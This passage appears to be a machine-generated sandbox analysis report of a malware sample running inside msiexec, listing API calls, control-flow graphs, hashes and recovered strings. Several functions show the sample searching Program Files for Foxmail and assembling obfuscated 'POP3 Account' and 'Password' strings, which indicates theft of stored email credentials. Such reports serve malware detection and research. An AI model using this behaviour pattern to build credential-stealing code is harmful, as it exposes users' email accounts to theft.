22f5adf2 7426->7429 7428 22f56355 __dosmaperr 20 API calls 7427->7428 7431 22f5ade2 7428->7431 7430 22f5ae2d 7429->7430 7434 22f5ae19 7429->7434 7432 22f56355 __dosmaperr 20 API calls 7430->7432 7433 22f56368 __dosmaperr 20 API calls 7431->7433 7435 22f5ae32 7432->7435 7439 22f5a070 7433->7439 7614 22f5ada6 7434->7614 7437 22f56368 __dosmaperr 20 API calls 7435->7437 7438 22f5ae3a 7437->7438 7440 22f562ac ___std_exception_copy 26 API calls 7438->7440 7439->7408 7439->7409 7440->7439 7442 22f59a2e ___DestructExceptionObject 7441->7442 7443 22f59a36 7442->7443 7444 22f59a4e 7442->7444 7466 22f56355 7443->7466 7446 22f59aec 7444->7446 7450 22f59a83 7444->7450 7448 22f56355 __dosmaperr 20 API calls 7446->7448 7451 22f59af1 7448->7451 7449 22f56368 __dosmaperr 20 API calls 7460 22f59a43 _abort 7449->7460 7469 22f58c7b RtlEnterCriticalSection 7450->7469 7453 22f56368 __dosmaperr 20 API calls 7451->7453 7455 22f59af9 7453->7455 7454 22f59a89 7456 22f59aa5 7454->7456 7457 22f59aba 7454->7457 7458 22f562ac ___std_exception_copy 26 API calls 7455->7458 7459 22f56368 __dosmaperr 20 API calls 7456->7459 7470 22f59b0d 7457->7470 7458->7460 7462 22f59aaa 7459->7462 7460->7416 7464 22f56355 __dosmaperr 20 API calls 7462->7464 7463 22f59ab5 7521 22f59ae4 7463->7521 7464->7463 7467 22f55b7a __dosmaperr 20 API calls 7466->7467 7468 22f5635a 7467->7468 7468->7449 7469->7454 7471 22f59b3b 7470->7471 7509 22f59b34 7470->7509 7472 22f59b3f 7471->7472 7473 22f59b5e 7471->7473 7475 22f56355 __dosmaperr 20 API calls 7472->7475 7476 22f59baf 7473->7476 7477 22f59b92 7473->7477 7474 22f52ada _ValidateLocalCookies 5 API calls 7478 22f59d15 7474->7478 7479 22f59b44 7475->7479 7481 22f59bc5 7476->7481 7524 22f5a00b 7476->7524 7480 22f56355 __dosmaperr 20 API calls 7477->7480 7478->7463 7482 22f56368 __dosmaperr 20 API calls 7479->7482 7484 22f59b97 7480->7484 7527 22f596b2 7481->7527 7486 22f59b4b 7482->7486 7488 22f56368 __dosmaperr 20 API calls 7484->7488 7489 22f562ac ___std_exception_copy 26 API calls 7486->7489 7492 22f59b9f 7488->7492 7489->7509 7490 22f59bd3 7493 22f59bd7 7490->7493 7494 22f59bf9 7490->7494 7491 22f59c0c 7496 22f59c66 WriteFile 7491->7496 7497 22f59c20 7491->7497 7495 22f562ac ___std_exception_copy 26 API calls 7492->7495 7498 22f59ccd 7493->7498 7534 22f59645 7493->7534 7539 22f59492 GetConsoleCP 7494->7539 7495->7509 7500 22f59c89 GetLastError 7496->7500 7505 22f59bef 7496->7505 7501 22f59c56 7497->7501 7502 22f59c28 7497->7502 7498->7509 7510 22f56368 __dosmaperr 20 API calls 7498->7510 7500->7505 7565 22f59728 7501->7565 7506 22f59c46 7502->7506 7507 22f59c2d 7502->7507 7505->7498 7505->7509 7513 22f59ca9 7505->7513 7557 22f598f5 7506->7557 7507->7498 7550 22f59807 7507->7550 7509->7474 7512 22f59cf2 7510->7512 7514 22f56355 __dosmaperr 20 API calls 7512->7514 7515 22f59cc4 7513->7515 7516 22f59cb0 7513->7516 7514->7509 7572 22f56332 7515->7572 7517 22f56368 __dosmaperr 20 API calls 7516->7517 7519 22f59cb5 7517->7519 7520 22f56355 __dosmaperr 20 API calls 7519->7520 7520->7509 7613 22f58c9e RtlLeaveCriticalSection 7521->7613 7523 22f59aea 7523->7460 7577 22f59f8d 7524->7577 7599 22f58dbc 7527->7599 7529 22f596c2 7530 22f596c7 7529->7530 7531 22f55af6 _abort 38 API calls 7529->7531 7530->7490 7530->7491 7532 22f596ea 7531->7532 7532->7530 7533 22f59708 GetConsoleMode 7532->7533 7533->7530 7535 22f5969f 7534->7535 7537 22f5966a 7534->7537 7535->7505 7536 22f5a181 WriteConsoleW CreateFileW 7536->7537 7537->7535 7537->7536 7538 22f596a1 GetLastError 7537->7538 7538->7535 7540 22f59607 7539->7540 7544 22f594f5 7539->7544 7541 22f52ada _ValidateLocalCookies 5 API calls 7540->7541 7542 22f59641 7541->7542 7542->7505 7544->7540 7545 22f5957b WideCharToMultiByte 7544->7545 7547 22f579e6 40 API calls __fassign 7544->7547 7549 22f595d2 WriteFile 7544->7549 7608 22f57c19 7544->7608 7545->7540 7546 22f595a1 WriteFile 7545->7546 7546->7544 7548 22f5962a GetLastError 7546->7548 7547->7544 7548->7540 7549->7544 7549->7548 7555 22f59816 7550->7555 7551 22f598d8 7552 22f52ada _ValidateLocalCookies 5 API calls 7551->7552 7554 22f598f1 7552->7554 7553 22f59894 WriteFile 7553->7555 7556 22f598da GetLastError 7553->7556 7554->7505 7555->7551 7555->7553 7556->7551 7564 22f59904 7557->7564 7558 22f59a0f 7559 22f52ada _ValidateLocalCookies 5 API calls 7558->7559 7561 22f59a1e 7559->7561 7560 22f59986 WideCharToMultiByte 7562 22f59a07 GetLastError 7560->7562 7563 22f599bb WriteFile 7560->7563 7561->7505 7562->7558 7563->7562 7563->7564 7564->7558 7564->7560 7564->7563 7569 22f59737 7565->7569 7566 22f597ea 7567 22f52ada _ValidateLocalCookies 5 API calls 7566->7567 7571 22f59803 7567->7571 7568 22f597a9 WriteFile 7568->7569 7570 22f597ec GetLastError 7568->7570 7569->7566 7569->7568 7570->7566 7571->7505 7573 22f56355 __dosmaperr 20 API calls 7572->7573 7574 22f5633d __dosmaperr 7573->7574 7575 22f56368 __dosmaperr 20 API calls 7574->7575 7576 22f56350 7575->7576 7576->7509 7586 22f58d52 7577->7586 7579 22f59f9f 7580 22f59fa7 7579->7580 7581 22f59fb8 SetFilePointerEx 7579->7581 7582 22f56368 __dosmaperr 20 API calls 7580->7582 7583 22f59fd0 GetLastError 7581->7583 7585 22f59fac 7581->7585 7582->7585 7584 22f56332 __dosmaperr 20 API calls 7583->7584 7584->7585 7585->7481 7587 22f58d74 7586->7587 7588 22f58d5f 7586->7588 7591 22f56355 __dosmaperr 20 API calls 7587->7591 7593 22f58d99 7587->7593 7589 22f56355 __dosmaperr 20 API calls 7588->7589 7590 22f58d64 7589->7590 7592 22f56368 __dosmaperr 20 API calls 7590->7592 7594 22f58da4 7591->7594 7595 22f58d6c 7592->7595 7593->7579 7596 22f56368 __dosmaperr 20 API calls 7594->7596 7595->7579 7597 22f58dac 7596->7597 7598 22f562ac ___std_exception_copy 26 API calls 7597->7598 7598->7595 7600 22f58dd6 7599->7600 7601 22f58dc9 7599->7601 7603 22f58de2 7600->7603 7604 22f56368 __dosmaperr 20 API calls 7600->7604 7602 22f56368 __dosmaperr 20 API calls 7601->7602 7605 22f58dce 7602->7605 7603->7529 7606 22f58e03 7604->7606 7605->7529 7607 22f562ac ___std_exception_copy 26 API calls 7606->7607 7607->7605 7609 22f55af6 _abort 38 API calls 7608->7609 7610 22f57c24 7609->7610 7611 22f57a00 __fassign 38 API calls 7610->7611 7612 22f57c34 7611->7612 7612->7544 7613->7523 7617 22f5ad24 7614->7617 7616 22f5adca 7616->7439 7618 22f5ad30 ___DestructExceptionObject 7617->7618 7628 22f58c7b RtlEnterCriticalSection 7618->7628 7620 22f5ad3e 7621 22f5ad65 7620->7621 7622 22f5ad70 7620->7622 7629 22f5ae4d 7621->7629 7624 22f56368 __dosmaperr 20 API calls 7622->7624 7625 22f5ad6b 7624->7625 7644 22f5ad9a 7625->7644 7627 22f5ad8d _abort 7627->7616 7628->7620 7630 22f58d52 26 API calls 7629->7630 7633 22f5ae5d 7630->7633 7631 22f5ae63 7647 22f58cc1 7631->7647 7633->7631 7634 22f5ae95 7633->7634 7636 22f58d52 26 API calls 7633->7636 7634->7631 7637 22f58d52 26 API calls 7634->7637 7639 22f5ae8c 7636->7639 7640 22f5aea1 CloseHandle 7637->7640 7638 22f5aedd 7638->7625 7643 22f58d52 26 API calls 7639->7643 7640->7631 7641 22f5aead GetLastError 7640->7641 7641->7631 7642 22f56332 __dosmaperr 20 API calls 7642->7638 7643->7634 7656 22f58c9e RtlLeaveCriticalSection 7644->7656 7646 22f5ada4 7646->7627 7648 22f58d37 7647->7648 7649 22f58cd0 7647->7649 7650 22f56368 __dosmaperr 20 API calls 7648->7650 7649->7648 7655 22f58cfa 7649->7655 7651 22f58d3c 7650->7651 7652 22f56355 __dosmaperr 20 API calls 7651->7652 7653 22f58d27 7652->7653 7653->7638 7653->7642 7654 22f58d21 SetStdHandle 7654->7653 7655->7653 7655->7654 7656->7646 7657->7412 7658->7392

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 22F51137
                                                                                            • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 22F51151
                                                                                            • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 22F5115C
                                                                                            • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 22F5116D
                                                                                            • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 22F5117C
                                                                                            • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 22F51193
                                                                                            • FindNextFileW.KERNELBASE(00000000,00000010), ref: 22F511D0
                                                                                            • FindClose.KERNEL32(00000000), ref: 22F511DB
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.3321607424.0000000022F51000.00000040.00001000.00020000.00000000.sdmp, Offset: 22F50000, based on PE: true
                                                                                            • Associated: 00000006.00000002.3321557181.0000000022F50000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.3321607424.0000000022F66000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_22f50000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: lstrlen$Find$File$CloseFirstNextlstrcat
                                                                                            • String ID:
                                                                                            • API String ID: 1083526818-0
                                                                                            • Opcode ID: 3c019c0c58041275962ac7a3942f701c96184ba22c10df55858aee781caaebe2
                                                                                            • Instruction ID: be7bc7d68c5c4c1e799dd827f7a0d0013993818f9f8dfe7fa6a0b2dc9245260f
                                                                                            • Opcode Fuzzy Hash: 3c019c0c58041275962ac7a3942f701c96184ba22c10df55858aee781caaebe2
                                                                                            • Instruction Fuzzy Hash: 3A21C3725443086BD714EA649C4CF9BBBDCEF84714F000E2AFA58D3190E774D6148796

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 22F51434
                                                                                              • Part of subcall function 22F510F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 22F51137
                                                                                              • Part of subcall function 22F510F1: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 22F51151
                                                                                              • Part of subcall function 22F510F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 22F5115C
                                                                                              • Part of subcall function 22F510F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 22F5116D
                                                                                              • Part of subcall function 22F510F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 22F5117C
                                                                                              • Part of subcall function 22F510F1: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 22F51193
                                                                                              • Part of subcall function 22F510F1: FindNextFileW.KERNELBASE(00000000,00000010), ref: 22F511D0
                                                                                              • Part of subcall function 22F510F1: FindClose.KERNEL32(00000000), ref: 22F511DB
                                                                                            • lstrlenW.KERNEL32(?), ref: 22F514C5
                                                                                            • lstrlenW.KERNEL32(?), ref: 22F514E0
                                                                                            • lstrlenW.KERNEL32(?,?), ref: 22F5150F
                                                                                            • lstrcatW.KERNEL32(00000000), ref: 22F51521
                                                                                            • lstrlenW.KERNEL32(?,?), ref: 22F51547
                                                                                            • lstrcatW.KERNEL32(00000000), ref: 22F51553
                                                                                            • lstrlenW.KERNEL32(?,?), ref: 22F51579
                                                                                            • lstrcatW.KERNEL32(00000000), ref: 22F51585
                                                                                            • lstrlenW.KERNEL32(?,?), ref: 22F515AB
                                                                                            • lstrcatW.KERNEL32(00000000), ref: 22F515B7
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.3321607424.0000000022F51000.00000040.00001000.00020000.00000000.sdmp, Offset: 22F50000, based on PE: true
                                                                                            • Associated: 00000006.00000002.3321557181.0000000022F50000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.3321607424.0000000022F66000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_22f50000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
                                                                                            • String ID: )$Foxmail$ProgramFiles
                                                                                            • API String ID: 672098462-2938083778
                                                                                            • Opcode ID: 7860d3671a3b020a5caab5ad31f3db5f6f71ecbad6c3a36c344b7cd45e4a97cb
                                                                                            • Instruction ID: 1276d95d585f78453803aed99ae2322b6f019f056a3e33714ca7ebb7cc95aec6
                                                                                            • Opcode Fuzzy Hash: 7860d3671a3b020a5caab5ad31f3db5f6f71ecbad6c3a36c344b7cd45e4a97cb
                                                                                            • Instruction Fuzzy Hash: 7381B571A4035CA9EB24DBA4DC85FEF737AEF84710F000596F608E71A0EAB15A94CF95
                                                                                            APIs
                                                                                            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 22F561DA
                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 22F561E4
                                                                                            • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 22F561F1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.3321607424.0000000022F51000.00000040.00001000.00020000.00000000.sdmp, Offset: 22F50000, based on PE: true
                                                                                            • Associated: 00000006.00000002.3321557181.0000000022F50000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.3321607424.0000000022F66000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_22f50000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                            • String ID:
                                                                                            • API String ID: 3906539128-0
                                                                                            • Opcode ID: 28b0df5d043972aa0e3a5f1e36be202f67f1afb0b03e044d6b82a0cfe6dbd85f
                                                                                            • Instruction ID: 338ab0b760e839b35040bdd59a192c38bf6a329565a5e1256401ebb9b6ece255
                                                                                            • Opcode Fuzzy Hash: 28b0df5d043972aa0e3a5f1e36be202f67f1afb0b03e044d6b82a0cfe6dbd85f
                                                                                            • Instruction Fuzzy Hash: C631F37594131CABCB25DF28D98878DBBB8EF08710F1042DAE91CA7250E7749B918F44
                                                                                            APIs
                                                                                            • GetCurrentProcess.KERNEL32(?,?,22F54A8A,?,22F62238,0000000C,22F54BBD,00000000,00000000,?,22F52082,22F62108,0000000C,22F51F3A,?), ref: 22F54AD5
                                                                                            • TerminateProcess.KERNEL32(00000000,?,22F54A8A,?,22F62238,0000000C,22F54BBD,00000000,00000000,?,22F52082,22F62108,0000000C,22F51F3A,?), ref: 22F54ADC
                                                                                            • ExitProcess.KERNEL32 ref: 22F54AEE
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.3321607424.0000000022F51000.00000040.00001000.00020000.00000000.sdmp, Offset: 22F50000, based on PE: true
                                                                                            • Associated: 00000006.00000002.3321557181.0000000022F50000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.3321607424.0000000022F66000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_22f50000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: Process$CurrentExitTerminate
                                                                                            • String ID:
                                                                                            • API String ID: 1703294689-0
                                                                                            • Opcode ID: 7d9991dd24593b1a7d4ec606c21e77a80b3edd64651695d2584850fce2679b9a
                                                                                            • Instruction ID: 8d4c38c03210a54dca2ab7eefed8d14c1ed01479c27dd527c5f5618994ce88f7
                                                                                            • Opcode Fuzzy Hash: 7d9991dd24593b1a7d4ec606c21e77a80b3edd64651695d2584850fce2679b9a
                                                                                            • Instruction Fuzzy Hash: 7DE04636001308AFCF096F28CE08A497F2AFF00B41B004410FE059B029DB39D972DA44
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.3321607424.0000000022F51000.00000040.00001000.00020000.00000000.sdmp, Offset: 22F50000, based on PE: true
                                                                                            • Associated: 00000006.00000002.3321557181.0000000022F50000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.3321607424.0000000022F66000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_22f50000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: HeapProcess
                                                                                            • String ID:
                                                                                            • API String ID: 54951025-0
                                                                                            • Opcode ID: 26f269b3106a01a61c73adae8f0cd710cefd4072d460a8021bdbef58b50f6e63
                                                                                            • Instruction ID: 6a9139ae2166b15acf5dbf438af146e9e7c89ee7b833fb109248f7ac15170aca
                                                                                            • Opcode Fuzzy Hash: 26f269b3106a01a61c73adae8f0cd710cefd4072d460a8021bdbef58b50f6e63
                                                                                            • Instruction Fuzzy Hash: 42A011302822038F83888E38820A20CBAACAA00A80B000828EC28C808CEB2880208B00

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                              • Part of subcall function 22F51CCA: CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 22F51D1B
                                                                                              • Part of subcall function 22F51CCA: CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 22F51D37
                                                                                              • Part of subcall function 22F51CCA: DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 22F51D4B
                                                                                            • _strlen.LIBCMT ref: 22F51855
                                                                                            • _strlen.LIBCMT ref: 22F51869
                                                                                            • _strlen.LIBCMT ref: 22F5188B
                                                                                            • _strlen.LIBCMT ref: 22F518AE
                                                                                            • _strlen.LIBCMT ref: 22F518C8
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.3321607424.0000000022F51000.00000040.00001000.00020000.00000000.sdmp, Offset: 22F50000, based on PE: true
                                                                                            • Associated: 00000006.00000002.3321557181.0000000022F50000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.3321607424.0000000022F66000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_22f50000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: _strlen$File$CopyCreateDelete
                                                                                            • String ID: Acco$Acco$POP3$POP3$Pass$Pass$t$t$un$un$word$word
                                                                                            • API String ID: 3296212668-3023110444
                                                                                            • Opcode ID: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                                                            • Instruction ID: 96ed233846fef91fa83077e29e5330e8005921760be342a00a454e8fad7e5d05
                                                                                            • Opcode Fuzzy Hash: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                                                            • Instruction Fuzzy Hash: 4B61D271D00318BBEF198BA4C950BDFB7BBAF55304F00415AD704A7261EB746A65CF92

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.3321607424.0000000022F51000.00000040.00001000.00020000.00000000.sdmp, Offset: 22F50000, based on PE: true
                                                                                            • Associated: 00000006.00000002.3321557181.0000000022F50000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.3321607424.0000000022F66000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_22f50000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: _strlen
                                                                                            • String ID: %m$~$Gon~$~F@7$~dra
                                                                                            • API String ID: 4218353326-230879103
                                                                                            • Opcode ID: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                                                            • Instruction ID: b7d437f08d2f47e80ef8dce6fc2f8ba4a851b49c16ca79e06238eb30fdd7cfe9
                                                                                            • Opcode Fuzzy Hash: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                                                            • Instruction Fuzzy Hash: 427106B1D003286BDF159BB49D84AEF7BFE9F15304F104096EB44E7242E674A795CBA0

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 203 22f57cc2-22f57cd6 204 22f57d44-22f57d4c 203->204 205 22f57cd8-22f57cdd 203->205 206 22f57d93-22f57dab call 22f57e35 204->206 207 22f57d4e-22f57d51 204->207 205->204 208 22f57cdf-22f57ce4 205->208 216 22f57dae-22f57db5 206->216 207->206 209 22f57d53-22f57d90 call 22f5571e * 4 207->209 208->204 211 22f57ce6-22f57ce9 208->211 209->206 211->204 214 22f57ceb-22f57cf3 211->214 217 22f57cf5-22f57cf8 214->217 218 22f57d0d-22f57d15 214->218 222 22f57dd4-22f57dd8 216->222 223 22f57db7-22f57dbb 216->223 217->218 224 22f57cfa-22f57d0c call 22f5571e call 22f590ba 217->224 220 22f57d17-22f57d1a 218->220 221 22f57d2f-22f57d43 call 22f5571e * 2 218->221 220->221 226 22f57d1c-22f57d2e call 22f5571e call 22f591b8 220->226 221->204 227 22f57df0-22f57dfc 222->227 228 22f57dda-22f57ddf 222->228 230 22f57dd1 223->230 231 22f57dbd-22f57dc0 223->231 224->218 226->221 227->216 240 22f57dfe-22f57e0b call 22f5571e 227->240 237 22f57de1-22f57de4 228->237 238 22f57ded 228->238 230->222 231->230 233 22f57dc2-22f57dd0 call 22f5571e * 2 231->233 233->230 237->238 245 22f57de6-22f57dec call 22f5571e 237->245 238->227 245->238
                                                                                            APIs
                                                                                            • ___free_lconv_mon.LIBCMT ref: 22F57D06
                                                                                              • Part of subcall function 22F590BA: _free.LIBCMT ref: 22F590D7
                                                                                              • Part of subcall function 22F590BA: _free.LIBCMT ref: 22F590E9
                                                                                              • Part of subcall function 22F590BA: _free.LIBCMT ref: 22F590FB
                                                                                              • Part of subcall function 22F590BA: _free.LIBCMT ref: 22F5910D
                                                                                              • Part of subcall function 22F590BA: _free.LIBCMT ref: 22F5911F
                                                                                              • Part of subcall function 22F590BA: _free.LIBCMT ref: 22F59131
                                                                                              • Part of subcall function 22F590BA: _free.LIBCMT ref: 22F59143
                                                                                              • Part of subcall function 22F590BA: _free.LIBCMT ref: 22F59155
                                                                                              • Part of subcall function 22F590BA: _free.LIBCMT ref: 22F59167
                                                                                              • Part of subcall function 22F590BA: _free.LIBCMT ref: 22F59179
                                                                                              • Part of subcall function 22F590BA: _free.LIBCMT ref: 22F5918B
                                                                                              • Part of subcall function 22F590BA: _free.LIBCMT ref: 22F5919D
                                                                                              • Part of subcall function 22F590BA: _free.LIBCMT ref: 22F591AF
                                                                                            • _free.LIBCMT ref: 22F57CFB
                                                                                              • Part of subcall function 22F5571E: HeapFree.KERNEL32(00000000,00000000,?,22F5924F,?,00000000,?,00000000,?,22F59276,?,00000007,?,?,22F57E5A,?), ref: 22F55734
                                                                                              • Part of subcall function 22F5571E: GetLastError.KERNEL32(?,?,22F5924F,?,00000000,?,00000000,?,22F59276,?,00000007,?,?,22F57E5A,?,?), ref: 22F55746
                                                                                            • _free.LIBCMT ref: 22F57D1D
                                                                                            • _free.LIBCMT ref: 22F57D32
                                                                                            • _free.LIBCMT ref: 22F57D3D
                                                                                            • _free.LIBCMT ref: 22F57D5F
                                                                                            • _free.LIBCMT ref: 22F57D72
                                                                                            • _free.LIBCMT ref: 22F57D80
                                                                                            • _free.LIBCMT ref: 22F57D8B
                                                                                            • _free.LIBCMT ref: 22F57DC3
                                                                                            • _free.LIBCMT ref: 22F57DCA
                                                                                            • _free.LIBCMT ref: 22F57DE7
                                                                                            • _free.LIBCMT ref: 22F57DFF
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.3321607424.0000000022F51000.00000040.00001000.00020000.00000000.sdmp, Offset: 22F50000, based on PE: true
                                                                                            • Associated: 00000006.00000002.3321557181.0000000022F50000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.3321607424.0000000022F66000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_22f50000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                            • String ID:
                                                                                            • API String ID: 161543041-0
                                                                                            • Opcode ID: 2c0d3e288313f3f951558c737070ce98937b4a0161155cbd654e973e86d831bc
                                                                                            • Instruction ID: cf6730b43c5eabcc810b69b7e9f0f3e9422a94428e937715107402109f73e6c1
                                                                                            • Opcode Fuzzy Hash: 2c0d3e288313f3f951558c737070ce98937b4a0161155cbd654e973e86d831bc
                                                                                            • Instruction Fuzzy Hash: B5314F71604708EFEB359B39EA40BA6B7EBEF00314F104459EA5ADB191DF71A9A1CB10

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • _free.LIBCMT ref: 22F559EA
                                                                                              • Part of subcall function 22F5571E: HeapFree.KERNEL32(00000000,00000000,?,22F5924F,?,00000000,?,00000000,?,22F59276,?,00000007,?,?,22F57E5A,?), ref: 22F55734
                                                                                              • Part of subcall function 22F5571E: GetLastError.KERNEL32(?,?,22F5924F,?,00000000,?,00000000,?,22F59276,?,00000007,?,?,22F57E5A,?,?), ref: 22F55746
                                                                                            • _free.LIBCMT ref: 22F559F6
                                                                                            • _free.LIBCMT ref: 22F55A01
                                                                                            • _free.LIBCMT ref: 22F55A0C
                                                                                            • _free.LIBCMT ref: 22F55A17
                                                                                            • _free.LIBCMT ref: 22F55A22
                                                                                            • _free.LIBCMT ref: 22F55A2D
                                                                                            • _free.LIBCMT ref: 22F55A38
                                                                                            • _free.LIBCMT ref: 22F55A43
                                                                                            • _free.LIBCMT ref: 22F55A51
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.3321607424.0000000022F51000.00000040.00001000.00020000.00000000.sdmp, Offset: 22F50000, based on PE: true
                                                                                            • Associated: 00000006.00000002.3321557181.0000000022F50000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.3321607424.0000000022F66000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_22f50000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                            • String ID:
                                                                                            • API String ID: 776569668-0
                                                                                            • Opcode ID: 36fcde5d5183bac1f4c29bcf7e073a94d27973c49b19419621f38b525d008baa
                                                                                            • Instruction ID: 0897869d60d15538e7f2d6cead65f85616f95c9464b28e586381026f4e54d2aa
                                                                                            • Opcode Fuzzy Hash: 36fcde5d5183bac1f4c29bcf7e073a94d27973c49b19419621f38b525d008baa
                                                                                            • Instruction Fuzzy Hash: EC11747A52034CFFCF25DF54D941CDD3FA6EF14350B5541A5BA088B225DA31DA619B80

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 287 22f5aa53-22f5aa6e 288 22f5aa80 287->288 289 22f5aa70-22f5aa7e RtlDecodePointer 287->289 290 22f5aa85-22f5aa8b 288->290 289->290 291 22f5aa91 290->291 292 22f5abb2-22f5abb5 290->292 295 22f5aa97-22f5aa9a 291->295 296 22f5aba6 291->296 293 22f5abb7-22f5abba 292->293 294 22f5ac12 292->294 300 22f5ac06 293->300 301 22f5abbc-22f5abbf 293->301 297 22f5ac19 294->297 298 22f5ab47-22f5ab4a 295->298 299 22f5aaa0 295->299 302 22f5aba8-22f5abad 296->302 303 22f5ac20-22f5ac49 297->303 308 22f5ab9d-22f5aba4 298->308 309 22f5ab4c-22f5ab4f 298->309 304 22f5ab34-22f5ab42 299->304 305 22f5aaa6-22f5aaab 299->305 300->294 306 22f5abc1-22f5abc4 301->306 307 22f5abfa 301->307 310 22f5ac5b-22f5ac6a call 22f52ada 302->310 334 22f5ac56-22f5ac59 303->334 335 22f5ac4b-22f5ac50 call 22f56368 303->335 304->303 311 22f5ab25-22f5ab2f 305->311 312 22f5aaad-22f5aab0 305->312 313 22f5abc6-22f5abc9 306->313 314 22f5abee 306->314 307->300 318 22f5ab61-22f5ab8f 308->318 315 22f5ab94-22f5ab9b 309->315 316 22f5ab51-22f5ab54 309->316 311->303 320 22f5aab2-22f5aab5 312->320 321 22f5ab1c-22f5ab23 312->321 322 22f5abe2 313->322 323 22f5abcb-22f5abd0 313->323 314->307 315->297 316->310 324 22f5ab5a 316->324 318->334 327 22f5aab7-22f5aaba 320->327 328 22f5ab0d-22f5ab17 320->328 326 22f5aac7-22f5aaf7 321->326 322->314 329 22f5abd2-22f5abd5 323->329 330 